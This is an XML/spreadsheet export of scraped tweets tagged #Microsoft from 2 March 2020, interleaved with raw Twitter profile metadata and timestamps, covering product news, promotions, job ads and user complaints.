    <t>{'id': 1060296753453379584, 'id_str': '1060296753453379584', 'name': 'EGG Deals', 'screen_name': 'EGGCloseout', 'location': 'Brooklyn, NY', 'description': 'Deals Daily #dailydeals #deals #sale #ebay #wholesale #TeamStallion #followback #follow4follow #1EmpireDrive #1DDrive #f4f', 'url': 'https://t.co/oZXClCFYgS', 'entities': {'url': {'urls': [{'url': 'https://t.co/oZXClCFYgS', 'expanded_url': 'http://ebay.com/usr/dealbites', 'display_url': 'ebay.com/usr/dealbites', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 446, 'friends_count': 620, 'listed_count': 1, 'created_at': 'Wed Nov 07 22:23:40 +0000 2018', 'favourites_count': 20, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1988,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'http://pbs.twimg.com/profile_images/1235790933226123264/WAV5Or8B_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235790933226123264/WAV5Or8B_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1060296753453379584/1583471017',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</si>
  <si>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19:38:53 +0000 2020</t>
  </si>
  <si>
    <t>https://t.co/77k5LabwZd
CORSO ECDL BASE - WORD
#aica #applicazioni #apps #computer #doc #document #ecdl #elaborazione #input #microsoft #microsoft_office_suite #modulo_3 #office #output #save #software #suite #texteditor #word #wordprocessing #icdl
https://t.co/miXfvkAQFc https://t.co/BCyK0xyU08</t>
  </si>
  <si>
    <t>Mon Mar 02 19:37:36 +0000 2020</t>
  </si>
  <si>
    <t>NEW ARTICLE! How to use #Microsoft #WVD, #Windows 10 multi-session, #FSLogix, &amp;amp; #MSIX app attach to build an #Azure-powered virtual desktop experience https://t.co/1r57Y0BBNy https://t.co/O1xT5sUCqq</t>
  </si>
  <si>
    <t>{'id': 161118111, 'id_str': '161118111', 'name': 'Jason Samuel', 'screen_name': '_JasonSamuel', 'location': 'Houston, TX', 'description': 'Architect | Author | Advisor | #CitrixCTP | #VMware #EUCChampion #vExpert | #Microsoft | #security | #cloud | #enterprisemobility | @AlchemyTechGrp', 'url': 'https://t.co/M4gIb8m9St', 'entities': {'url': {'urls': [{'url': 'https://t.co/M4gIb8m9St', 'expanded_url': 'http://www.jasonsamuel.com', 'display_url': 'jasonsamuel.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2890, 'friends_count': 1399, 'listed_count': 183, 'created_at': 'Wed Jun 30 01:25:13 +0000 2010', 'favourites_count': 6352, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 7229,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'http://pbs.twimg.com/profile_images/761316110281039878/NMbSY9eN_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/761316110281039878/NMbSY9eN_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/161118111/1553042697',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</si>
  <si>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19:37:02 +0000 2020</t>
  </si>
  <si>
    <t>From the Blog: Network Security Group Ruleset to CSV https://t.co/PzcGJP7Klw #Microsoft #Azure #AzureFamily #Blog</t>
  </si>
  <si>
    <t>Mon Mar 02 19:35:11 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft's cloud-based printing service is now in private preview https://t.co/nlZAbxbrLn #ZDNet #Microsoft</t>
  </si>
  <si>
    <t>Mon Mar 02 19:34:01 +0000 2020</t>
  </si>
  <si>
    <t>LAST CHANCE  Only 1 Day until our FREE webinar on #Microsoft EndPoint Management https://t.co/Fh3jJyeo08 Join the webinar to discover the best #EndPoint Management scenario for your environment. Avoid disappointment. Save your Seat Today! #security https://t.co/PluOfaCKer</t>
  </si>
  <si>
    <t>{'id': 895860930960965632, 'id_str': '895860930960965632', 'name': "Canada's 1st #Microsoft Cloud Partner", 'screen_name': 'Steeves_Assocs', 'location': 'Vancouver, British Columbia', 'description': 'Steeves and Associates help organizations build #infrastructure (#cloud), #mobility, #security &amp; identity since 1992. Follow us now for the latest news in #tech', 'url': 'https://t.co/K9q2eLv6zK', 'entities': {'url': {'urls': [{'url': 'https://t.co/K9q2eLv6zK', 'expanded_url': 'http://www.steeves.net', 'display_url': 'steeves.net', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 164, 'friends_count': 660, 'listed_count': 3, 'created_at': 'Fri Aug 11 04:14:25 +0000 2017', 'favourites_count': 590, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1222,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'http://pbs.twimg.com/profile_images/1151584595491508224/P7Hcz5Ur_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1151584595491508224/P7Hcz5Ur_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/895860930960965632/1528235619',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</si>
  <si>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Check out the press release about our device that was published on @BusinessWire here: https://t.co/5sJ5iAORuI
#pharma #healthcare #microsoft #technology #swittons #sales #hashtag #content #business #sales #brand #new #followers https://t.co/goVrx9cSKU</t>
  </si>
  <si>
    <t>{'id': 1128614453639958528, 'id_str': '1128614453639958528', 'name': 'Swittons IoT', 'screen_name': 'SwittonsIoT', 'location': 'Piscataway, NJ', 'description': 'Bringing a revolution of 1-Click Enterprise desktop solutions, to bring customers closer to you. Be Part of IT!', 'url': 'https://t.co/62o6L9hCf4', 'entities': {'url': {'urls': [{'url': 'https://t.co/62o6L9hCf4', 'expanded_url': 'https://www.swittons.com/', 'display_url': 'swittons.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 21, 'friends_count': 79, 'listed_count': 0, 'created_at': 'Wed May 15 10:53:49 +0000 2019', 'favourites_count': 2, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/1222568832507830272/Xfel-0V7_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1222568832507830272/Xfel-0V7_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1128614453639958528/1580318099',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</si>
  <si>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19:33:51 +0000 2020</t>
  </si>
  <si>
    <t>Institutions with paper-intensive tasks and onsite servers are especially prone to data loss and cyber attacks. Follow us to stay updated on how to protect your organization with #Microsoft. https://t.co/BIAaa2V5Fw</t>
  </si>
  <si>
    <t>Mon Mar 02 19:32:11 +0000 2020</t>
  </si>
  <si>
    <t>Thank you to @KarenMcelhatton, @AongusatDell &amp;amp; @clarecur for providing a fantastic and honest insight into #McLaren #Dell and #Microsoft on our Q&amp;amp;A panel today!   @McLarenGroup #IWD2020 #EachforEqual https://t.co/4BZ3jezaQd</t>
  </si>
  <si>
    <t>{'id': 129860521, 'id_str': '129860521', 'name': 'Ella Podmore', 'screen_name': 'ella_podmore', 'location': 'London, England', 'description': 'Materials Engineer for @mclarenauto â€¢ Autocarâ€™s Top 10 Female Rising Star 2019 â€¢ STEM Ambassador â€¢ GradIMMM â€¢ Keynote speaker ella.podmorebookings@gmail.com', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 218, 'friends_count': 337, 'listed_count': 2, 'created_at': 'Mon Apr 05 16:46:40 +0000 2010', 'favourites_count': 643, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 775,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'http://pbs.twimg.com/profile_images/1148338838735138817/MMlrCgnC_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1148338838735138817/MMlrCgnC_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/129860521/1551166303',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</si>
  <si>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19:30:14 +0000 2020</t>
  </si>
  <si>
    <t>Read how your network can have an affect on Office 365's performance and how you can get the best out of the application.
https://t.co/LriH6s5YzT
#Network #Office365 #saas #Microsoft #SDWAN</t>
  </si>
  <si>
    <t>Mon Mar 02 19:30:07 +0000 2020</t>
  </si>
  <si>
    <t>Why should you move to the #Cloud ? Here are just 5 reasons why...
https://t.co/wgtWHqQUgH
#DMS #BusinessCentral #MSDynNAV #MSDyn365BC #Microsoft @Microsoft https://t.co/f1elII1S8E</t>
  </si>
  <si>
    <t>{'id': 370238084, 'id_str': '370238084', 'name': 'DMS', 'screen_name': 'dynms', 'location': 'Edmonton', 'description': 'Delivering Microsoft Dynamics ERP, IT infrastructure, and custom software development for clients in the manufacturing and distribution industries. #DMS', 'url': 'http://t.co/mBcJwJLe1w', 'entities': {'url': {'urls': [{'url': 'http://t.co/mBcJwJLe1w', 'expanded_url': 'http://www.dynms.com', 'display_url': 'dynms.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1224, 'friends_count': 1289, 'listed_count': 44, 'created_at': 'Thu Sep 08 17:48:31 +0000 2011', 'favourites_count': 22, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1184,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'http://pbs.twimg.com/profile_images/848937577872736256/ihjqJvpx_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/848937577872736256/ihjqJvpx_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/370238084/1572887034', 'profile_link_color': '336699',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</si>
  <si>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19:30:00 +0000 2020</t>
  </si>
  <si>
    <t>In spite of the disappearing Windows desktop bug, nows a good time to install: https://t.co/dwcO2B2kOT via @computerworld #Microsoft</t>
  </si>
  <si>
    <t>Mon Mar 02 19:29:17 +0000 2020</t>
  </si>
  <si>
    <t>Job interviewer: So what made you want to come and work for us?
Me: Personally I believe my biggest problem is I dont listen.
#apple #Microsoft #job #Jobs #jobsearch #Amazon #Working #Employability #EmployeeAppreciationDay #boss #HR https://t.co/iPAx7YBFnD</t>
  </si>
  <si>
    <t>{'id': 964634886886879232, 'id_str': '964634886886879232', 'name': 'Andrew Meriweather', 'screen_name': 'andymeriweather', 'location': 'Canada', 'description': 'Another funny Canadian, eh? ðŸ', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 19, 'friends_count': 10, 'listed_count': 2, 'created_at': 'Fri Feb 16 22:57:33 +0000 2018', 'favourites_count': 618, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1092, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1221187978657239041/kA-9EJFR_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1221187978657239041/kA-9EJFR_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/964634886886879232/1576526216',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</si>
  <si>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19:28:01 +0000 2020</t>
  </si>
  <si>
    <t>Check out the press release on @SwittonsIoT that was released on @BusinessWire here: https://t.co/bbXb1QLmZT 
#pharma #healthcare #hashtag #twitter #content #media #business #microsoft #azure #technology #iot #new #brand #business #Sales https://t.co/G2Jlx2oVBS</t>
  </si>
  <si>
    <t>Mon Mar 02 19:27:19 +0000 2020</t>
  </si>
  <si>
    <t>Are you part of @MarkQJones massive #globalcon1 event where different speakers all around the world share info on #O365 and #Microsoft. All sessions live-streamed and therell be chat jams too. https://t.co/GYfBhoubUI</t>
  </si>
  <si>
    <t>{'id': 450340061, 'id_str': '450340061', 'name': 'Helen Blunden #AlwaysBeLearningðŸ¤”ðŸ§ ðŸ¦‰ðŸ“šðŸ¥‡', 'screen_name': 'ActivateLearn', 'location': 'Melbourne, Australia', 'description': '"The capacity to learn is a gift, the ability to learn is a skill, the willingness to learn is a choice"(Brian Herbert)| Learning &amp; Work is 1| @AdoptandEmbrace', 'url': 'https://t.co/EKQi2zidoB', 'entities': {'url': {'urls': [{'url': 'https://t.co/EKQi2zidoB', 'expanded_url': 'http://www.activatelearning.com.au', 'display_url': 'activatelearning.com.au', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 8385, 'friends_count': 2338, 'listed_count': 839, 'created_at': 'Fri Dec 30 04:13:31 +0000 2011', 'favourites_count': 23969, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 64497,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'http://pbs.twimg.com/profile_images/1195219355002212352/28f4GiBJ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1195219355002212352/28f4GiBJ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/450340061/1541911552',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</si>
  <si>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19:26:01 +0000 2020</t>
  </si>
  <si>
    <t>"Sabios bootcamp thoroughly prepared me for this and made me realize that I was just as competitive as people who had degrees in computer science and engineering," - David, Sabio Alumnus &amp;amp; Web Developer at #Microsoft 
https://t.co/fETb5Tyree
#LearnToCode #100DaysOfCode https://t.co/kVE4YS6qgG</t>
  </si>
  <si>
    <t>{'id': 874394695, 'id_str': '874394695', 'name': 'Sabio Coding Bootcamp', 'screen_name': 'WeSabio', 'location': 'WorldWide', 'description': 'Sabio is an innovative software-engineering training program for the exceptionally motivated. #LearnToCode #CodingBootcamp. Get to know us https://t.co/d3IFpe4Y1r', 'url': 'https://t.co/Or6NjBbEaJ', 'entities': {'url': {'urls': [{'url': 'https://t.co/Or6NjBbEaJ', 'expanded_url': 'http://sabio.la', 'display_url': 'sabio.la', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/d3IFpe4Y1r', 'expanded_url': 'http://bit.ly/SabioVids', 'display_url': 'bit.ly/SabioVids', 'indices': [139, 162]}]}}, 'protected': False, 'followers_count': 2790, 'friends_count': 431, 'listed_count': 295, 'created_at': 'Thu Oct 11 21:54:17 +0000 2012', 'favourites_count': 8769, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 20269,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'http://pbs.twimg.com/profile_images/1008337748946608128/qlYQYpx-_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1008337748946608128/qlYQYpx-_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/874394695/1521663840', 'profile_link_color': '16406E',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</si>
  <si>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19:23:59 +0000 2020</t>
  </si>
  <si>
    <t>#Inclusivity should be a key aim of any organisation. Watch as David Brown discusses some of the features of a #ModernWorkplace that you can use to become more inclusive and #accessible https://t.co/mMGvuzTvOZ
#Accessibility #Microsoft https://t.co/c7gWqhi32m</t>
  </si>
  <si>
    <t>Mon Mar 02 19:23:32 +0000 2020</t>
  </si>
  <si>
    <t>@XboxAmbassadorN @Xbox @XboxSupport @Microsoft The point is, if your system has 1tb and is expensive, we shouldn't need to spend extra. There's system memory, storage memory, and very little screen cap memory. It's ridiculous.
#microsoft #xbox</t>
  </si>
  <si>
    <t>{'id': 1121534626957160448, 'id_str': '1121534626957160448', 'name': 'MK', 'screen_name': 'MissOGgamer', 'location': '', 'description': 'Multifaceted:\nArtist.\nGamer.\nStreamer.\nBeauty.\nBrains.\n    â™¡  \nFollow my stream, visit my pages,\nand say Hello!\n#artist #gamer', 'url': 'https://t.co/xe5kzgIcMQ', 'entities': {'url': {'urls': [{'url': 'https://t.co/xe5kzgIcMQ', 'expanded_url': 'https://twitch.tv/MissOGgamer', 'display_url': 'twitch.tv/MissOGgamer', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 8, 'friends_count': 8, 'listed_count': 0, 'created_at': 'Thu Apr 25 22:01:06 +0000 2019', 'favourites_count': 173, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 198, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1126972374123868160/C1uoXYLZ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1126972374123868160/C1uoXYLZ_normal.jpg',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</si>
  <si>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19:22:04 +0000 2020</t>
  </si>
  <si>
    <t>Do you use both #Office365 and Auvik within your MSP? You can login to Auvik using your #Microsoft credentials. Learn how: https://t.co/qBY0AsInNB https://t.co/QGEYy7b5ZO</t>
  </si>
  <si>
    <t>{'id': 1379244128, 'id_str': '1379244128', 'name': 'Auvik Networks', 'screen_name': 'AuvikNetworks', 'location': 'Waterloo, Ontario', 'description': 'Auvik is network management for MSPs. Own the network.', 'url': 'http://t.co/n6AcZzVWhf', 'entities': {'url': {'urls': [{'url': 'http://t.co/n6AcZzVWhf', 'expanded_url': 'http://www.auvik.com', 'display_url': 'auvik.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2126, 'friends_count': 1046, 'listed_count': 72, 'created_at': 'Thu Apr 25 11:24:26 +0000 2013', 'favourites_count': 1193, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 10373, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '1D164F', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/453565275623800832/exS6YHX2_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/453565275623800832/exS6YHX2_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1379244128/1445534480', 'profile_link_color': '9A4ABF',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</si>
  <si>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19:20:37 +0000 2020</t>
  </si>
  <si>
    <t>via #Citrix Blogs: "How to get ready for the new MAM SDKs: " https://t.co/I7aASl3SfS
.
.
.
#blog #virtualization #cloudcomputing #cloud #security #microsoft #azure #citrix #citrixishow</t>
  </si>
  <si>
    <t>Mon Mar 02 19:19:04 +0000 2020</t>
  </si>
  <si>
    <t>Vox_ISMRT Vox_ISM: shoplogix - we are expecting a full house at #Microsoft #FPAC2020 in #Mississauga
#MSDyn365 #MSDyn365BC #Apps #MSApps
#Toront...</t>
  </si>
  <si>
    <t>Mon Mar 02 19:16:32 +0000 2020</t>
  </si>
  <si>
    <t>Come scaricare i giochi gratuiti con Games With Gold su Xbox One - #GamesWithGold #Tutorial #XboxOne #Microsoft https://t.co/idkIxPn4uv https://t.co/Qzwxk13ymK</t>
  </si>
  <si>
    <t>{'id': 1087455057149341698, 'id_str': '1087455057149341698', 'name': 'ClaudioMasci.com', 'screen_name': 'ClaudiomasciC', 'location': '', 'description': "Sito web d'informazione su tecnologia ed informatica", 'url': 'https://t.co/2bqPArfNWX', 'entities': {'url': {'urls': [{'url': 'https://t.co/2bqPArfNWX', 'expanded_url': 'http://www.claudiomasci.com', 'display_url': 'claudiomasci.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4, 'friends_count': 55, 'listed_count': 0, 'created_at': 'Mon Jan 21 21:01:04 +0000 2019', 'favourites_count': 3, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 294,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'http://pbs.twimg.com/profile_images/1087455570532159488/fVu_zJX7_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1087455570532159488/fVu_zJX7_normal.jpg',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</si>
  <si>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19:12:37 +0000 2020</t>
  </si>
  <si>
    <t>@WindowsDocs @VisualStudio Forcing users to use latest version of Windows in order to use #WindowsTerminal, which we all know it's buggy, is ridiculous. #Microsoft should encourage users to use latest version by quality not something like this.  I'm using @ConEmuMaximus5
 and I'm happy with it.</t>
  </si>
  <si>
    <t>{'id': 1083174277, 'id_str': '1083174277', 'name': 'Hypaethrame', 'screen_name': 'hypaethrame', 'location': 'Iran - Mashhad', 'description': 'Supported by:\n\nAly &amp; Fila, Manuel Le Saux, Bobina, Sneijder, ...\nSigned to:\nDefcon,  Trance All-Stars, Shah-Music, Redux, Pulsar, Extrema Global Music, ...', 'url': 'https://t.co/LH4Gu0lrRf', 'entities': {'url': {'urls': [{'url': 'https://t.co/LH4Gu0lrRf', 'expanded_url': 'https://soundcloud.com/hypaethrame', 'display_url': 'soundcloud.com/hypaethrame', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 718, 'friends_count': 52, 'listed_count': 16, 'created_at': 'Sat Jan 12 14:41:13 +0000 2013', 'favourites_count': 116, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1393, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': True, 'profile_background_color': '101010', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1223944057463943171/8WXv6zrC_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1223944057463943171/8WXv6zrC_normal.jpg', 'profile_link_color': '1C1C1C', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': '312203', 'profile_text_color': '65582C', 'profile_use_background_image': False, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Mon Mar 02 19:09:27 +0000 2020</t>
  </si>
  <si>
    <t>Azure HDInsight and Azure Database for PostgreSQL news: https://t.co/ybvrypKLxi #Azure #Microsoft</t>
  </si>
  <si>
    <t>Mon Mar 02 19:08:27 +0000 2020</t>
  </si>
  <si>
    <t>Enhancing SysOps with DevOps Since discovering it a few months ago, Manjaro Linux has been such a delight with its ease of use and performance. So good that, against c... #deployment #software #business #database #microsoft https://t.co/xIowyV1ndM https://t.co/GK32p3KAto</t>
  </si>
  <si>
    <t>Mon Mar 02 19:07:21 +0000 2020</t>
  </si>
  <si>
    <t>Preview of Active Directory authentication support on Azure Files
https://t.co/HsuqfNHZWL
#Microsoft #Azure #Cloud #Storage</t>
  </si>
  <si>
    <t>Mon Mar 02 19:06:36 +0000 2020</t>
  </si>
  <si>
    <t>Windows 7 support has ended. Are your medical devices upgraded? Learn how Novasyte Health's solutions can help: https://t.co/PHHNYD7IsF #novasyte #IQVIAMedTech #medtech #medtechindustry #microsoft #windows7 #fieldtechnical https://t.co/AzdHLIgyWk</t>
  </si>
  <si>
    <t>{'id': 2880029077, 'id_str': '2880029077', 'name': 'Novasyte Health', 'screen_name': 'novasytehealth', 'location': 'Carlsbad, CA', 'description': 'Novasyte Health, an IQVIA\x8fâ„¢ company, partners with medical device and diagnostic manufacturers, offering tech-enabled outsourced service teams and technologies.', 'url': 'http://t.co/SVKRaH3tEY', 'entities': {'url': {'urls': [{'url': 'http://t.co/SVKRaH3tEY', 'expanded_url': 'http://novasyte.com/', 'display_url': 'novasyte.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 186, 'friends_count': 216, 'listed_count': 19, 'created_at': 'Mon Oct 27 20:43:14 +0000 2014', 'favourites_count': 161, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1579,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'http://pbs.twimg.com/profile_images/557619510975291392/65VG96iX_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/557619510975291392/65VG96iX_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2880029077/1555095488', 'profile_link_color': '7ABD00',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</si>
  <si>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19:05:13 +0000 2020</t>
  </si>
  <si>
    <t>Troubleshooting and resolving #Windows 10 Always On #VPN error code 858. #Windows10 #Win10 #Microsoft #mobility #aovpn https://t.co/8uhPtTLMTs</t>
  </si>
  <si>
    <t>Mon Mar 02 19:03:15 +0000 2020</t>
  </si>
  <si>
    <t>Whats New in #Microsoft #Teams | February 2020 https://t.co/3EcQyE9rR0</t>
  </si>
  <si>
    <t>Mon Mar 02 19:02:00 +0000 2020</t>
  </si>
  <si>
    <t>Staying with the times shouldn't hurt your wallet so we're giving you 12% OFF all your software needs! Use the promo code CHANGE1220 at checkout and enjoy your discount! 
Buy today https://t.co/a9v9DfrtqY 
#Software #Microsoft #Sale https://t.co/qMwKWvRwcx</t>
  </si>
  <si>
    <t>{'id': 729923516187828224, 'id_str': '729923516187828224', 'name': 'SoftwareKeep', 'screen_name': 'softwarekeep', 'location': '', 'description': '', 'url': 'https://t.co/DN6KufbXCD', 'entities': {'url': {'urls': [{'url': 'https://t.co/DN6KufbXCD', 'expanded_url': 'http://softwarekeep.com', 'display_url': 'softwarekeep.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1707, 'friends_count': 447, 'listed_count': 20, 'created_at': 'Tue May 10 06:38:22 +0000 2016', 'favourites_count': 90, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 748,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'http://pbs.twimg.com/profile_images/842581831690022912/0QGRrX8U_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/842581831690022912/0QGRrX8U_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/729923516187828224/1511815123',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</si>
  <si>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19:01:25 +0000 2020</t>
  </si>
  <si>
    <t>We are seeking an Accounts Assistant to join a team on a temporary to permanent basis.
Apply today at https://t.co/mdwx5zh5bE or call the office on 01747 825568.
#GoOctopus #accounts #finance #administration #microsoft #ITskills #joinourteam #job #jobs https://t.co/2zo0fqjHBb</t>
  </si>
  <si>
    <t>Has your company outgrown its accounting software? Here are five tell-tale signs to watch out for, and how to grow beyond the limits. Get the infographic.     #Microsoft #Technology #IT #BusinessAutomation #accounting #MSDyn365 https://t.co/AXjts0zi8A</t>
  </si>
  <si>
    <t>Mon Mar 02 19:01:20 +0000 2020</t>
  </si>
  <si>
    <t>How to Install Citrix ADC (NetScaler ADC) VPX 13.0 at Microsoft Windows Server 2019 with Hyper-V #Citrix #NetScaler #ADC #VPX #Microsoft #Hyper-V #Windows Server 2019 #mvphour https://t.co/3eTX2mGc3u</t>
  </si>
  <si>
    <t>Mon Mar 02 19:01:14 +0000 2020</t>
  </si>
  <si>
    <t>How to Install Citrix ADC (NetScaler ADC) VPX 13.0 at Microsoft Windows Server 2019 with Hyper-V #Citrix #NetScaler #ADC #VPX #Microsoft #Hyper-V #Server 2019 #mvphour https://t.co/spsUhdk9Qg</t>
  </si>
  <si>
    <t>Mon Mar 02 19:01:11 +0000 2020</t>
  </si>
  <si>
    <t>See us this Thursday alongside FreePoint Technologies at VOX ISMs FPAC event where we will be showing #Manufacturers the #Financial and operational benefits they can experience with system #Integration: https://t.co/0ZemEIj3Tv
#Toronto #Manufacturing #Microsoft #Automation</t>
  </si>
  <si>
    <t>{'id': 48083091, 'id_str': '48083091', 'name': 'CoreSolutions', 'screen_name': 'CoreSolution', 'location': 'London, Ontario', 'description': 'Delivering customized #Software solutions that take you beyond software. #FileMaker Consulting &amp; Training. #Developing #Desktop, #Web &amp; #Mobile #Applications', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1989, 'friends_count': 3337, 'listed_count': 143, 'created_at': 'Wed Jun 17 19:31:53 +0000 2009', 'favourites_count': 1943, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3345,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'http://pbs.twimg.com/profile_images/688008911501197312/empbJn2O_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/688008911501197312/empbJn2O_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/48083091/1559580221', 'profile_link_color': 'DE2335', 'profile_sidebar_border_color': '1443CF', 'profile_sidebar_fill_color': 'C3E6F7', 'profile_text_color': '030303', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Mon Mar 02 19:00:53 +0000 2020</t>
  </si>
  <si>
    <t>#cloud      Did you know that 83% of employees depend on technology to work together? The landscape of teamwork is changing--but we've got you covered. This infographic shows how you can benefit from #Teamworksolutions from #Microsoft. https://t.co/k6qjem84Ni</t>
  </si>
  <si>
    <t>Mon Mar 02 19:00:05 +0000 2020</t>
  </si>
  <si>
    <t>#"...while not every tech business has the scope of #Microsoft, there are seven dimensions of #AI that all companies in the field should recognise and explore in order to achieve the same-targeted levels of power, ethics, and trust: https://t.co/BrluNjlxpI</t>
  </si>
  <si>
    <t>Mon Mar 02 19:00:01 +0000 2020</t>
  </si>
  <si>
    <t>Revoke your guest access to an Office 365 tenant (and Teams) https://t.co/v1j9HYCzID  #ITPro #SysAdmin #Office365 #MicrosoftTeams #Microsoft</t>
  </si>
  <si>
    <t>Mon Mar 02 18:57:12 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Tech Community Update Mar 3rd, 2020 https://t.co/w0H7Ujb477 #Microsoft</t>
  </si>
  <si>
    <t>Provisioning with SCIM  design, build, and test your SCIM endpoint https://t.co/5YlNa074iA #Microsoft</t>
  </si>
  <si>
    <t>Mon Mar 02 18:55:22 +0000 2020</t>
  </si>
  <si>
    <t>I would like to be touched on my body #Lubbock   #microsoft #heels https://t.co/K9p7rDxmUS</t>
  </si>
  <si>
